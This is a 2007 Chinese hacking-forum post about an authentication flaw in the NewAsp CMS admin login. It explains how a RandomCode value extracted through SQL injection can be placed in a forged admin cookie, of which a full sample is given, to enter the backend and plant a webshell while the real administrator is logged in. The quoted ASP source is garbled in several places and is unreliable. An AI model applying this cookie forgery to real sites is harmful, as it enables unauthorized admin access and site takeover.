|
|
信息来源:红狼安全小组(www.wolfexp.net) <br/>文章作者:阿呆 <br/>最近玩新云时,在COOKIE欺骗的时候,经常会遇到已经有管理员在线,不允许多用户同时登陆,导致进不了后台,拿不了webshell,很是郁闷,下了新云的源码回来看了下。在admin_login.asp文件里发现了个小问题,一起来看看(由于小弟ASP算不上入门,仅简单分析下,出错了别拿番茄炸我):<br/>Sub logout()<br/>'清除COOKIES中管理员身份的验证信息.<br/>Session.Abandon<br/>Session("AdminName") = ""<br/>Session("AdminPass") = ""<br/>Session("AdminGrade") = ""<br/>Session("AdminFlag") = ""<br/>Session("AdminStatus") = ""<br/>Session("AdminID") = ""<br/>Session("AdminRandomCode") = ""<br/>Response.Cookies(Admin_Cookies_Name) = ""<br/>Response.Redirect ("../")<br/>End Sub<br/>这里可以到,我们COOKIE提交的时候主要是提交AdminName,AdminPass,AdminGrade,AdminFlag,AdminStatus,AdminID,AdminRandomCode这几个参数,RandomCode是随机码,也就是登陆时验证管理员是否在线的参数。<br/>Sub chklogin()<br/>Dim adminname, password,RandomCode<br/>adminname = Trim(Replace(Request("adminname"), "'", ""))<br/>password = md5(Trim(Replace(Request("password"), "'", "")))<br/>If Newasp.CheckPost = False Then<br/>ErrMsg = ErrMsg + "您提交的数据不合法,请不要从外部提交登陆。"<br/>Founderr = True<br/>End If<br/>If Newasp.IsValidStr(Request("adminname")) = False Then<br/>ErrMsg = ErrMsg + "/li>"<br/>Founderr = True<br/>End If<br/>If Newasp.IsValidPassword(Request("password")) = False Then<br/>ErrMsg = ErrMsg + "/li>"<br/>Founderr = True<br/>End If<br/>If Request("verifycode") = "" Then<br/>ErrMsg = ErrMsg + "li>请返回输入确认码。br>" + "/li>"<br/>Founderr = True<br/>ElseIf CStr(Session("getcode"))br>" + "/li>"<br/>Founderr = True<br/>End If<br/>Session("getcode") = ""<br/>If adminname = "" Or password = "" Then<br/>Founderr = True<br/>ErrMsg = ErrMsg + "li>请输入您的用户名或密码。li>您输入的用户名和密码不正确或者您不是系统管理员。!> Rs("password") Then<br/>FoundErr = True<br/>ErrMsg = ErrMsg + "li>用户名或密码错误!!!> 0 Or Rs("isLock") = "" Then<br/>Founderr = True<br/>ErrMsg = "/li>"<br/>Exit Sub<br/>End If<br/>End If<br/>这里定义了三个变量adminname, password,RandomCode 可以看到,从事件开始到结束都没有对RandomCode变量进行判断。<br/>接着看到:<br/>RandomCode = Newasp.GetRandomCode<br/>Rs("LoginTime") = Now()<br/>Rs("Loginip") = Newasp.GetUserip<br/>可以看到RandomCode变量是直接从数据库中提取赋值的。<br/>也就是说,RandomCode存在于数据库中,并且程序对这个变量(随即码)没有进行任何判断。<br/>实际运用:<br/>我们在制造注入猜解的时候,在猜字段username,password,id时可以加猜一个RandomCode字段进行猜解,然后在提交的COOKIE中找到RandomCode把我们猜解出来的数据替换原来的<br/>例:<br/>ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1&Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce%2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1%2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1%2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2%2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2%2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3%2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5%2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5%2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser%2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect%2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData%2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=9f7fa2c6858e1e77&RandomCode=(这里填写RandomCode值)&AdminName=admin<br/><br/>这样在提交时 不论管理员是否在线都可以直接登陆后台。<br/><br/> S:文章分析的不是很专业,可能前辈们已经发现了这个漏洞,只是不愿公布,或者是公布了我没看到,总之,本着学习的精神与大家分享... |
|
窥视卡
雷达卡
发表于 2007-7-15 22:23:19
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡